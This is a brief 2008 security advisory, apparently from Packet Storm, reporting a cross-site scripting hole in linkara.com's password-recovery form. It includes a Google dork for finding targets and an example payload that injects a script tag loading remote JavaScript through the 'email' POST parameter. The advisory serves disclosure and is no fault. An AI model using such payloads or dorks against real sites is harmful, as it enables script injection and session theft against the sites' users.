Linkara.com appears to suffer from a cross site scripting vulnerability.
47df9a41daa82a81c0fbe2346aa186a147649757549a6de5287b80d46c319a00+==========================================================================+
+ Copyright 2004/2008 - Linkara & XSS Remote evil cOD3 +
+==========================================================================+
Author(s): Ivan Sanchez
Product: © Copyright 2004/2008 - Linkara, S.L.
Web:http://www.linkara.com/
Versions: 2004/2008 - Linkara
Date: 25/06/2008
"Linkara.com is a free comunity in Internet.... "
GOOGLE DORKS:
------------
"Copyright 2004/2008 - Linkara"
Exploit:
-------
¿Has olvidado tu contraseƱa?
http://www.linkara.com/recordar.html
In the Texbox insert evil remote code.
tHEN (wait seconds...)
Parameter POST=email (insert there evil , remote XSS)
Example: "><script src=http://site/scripts/evil.js></script>
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================+
+ Copyright 2004/2008 - Linkara & XSS Remote evil cOD3 +
+==========================================================================+
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed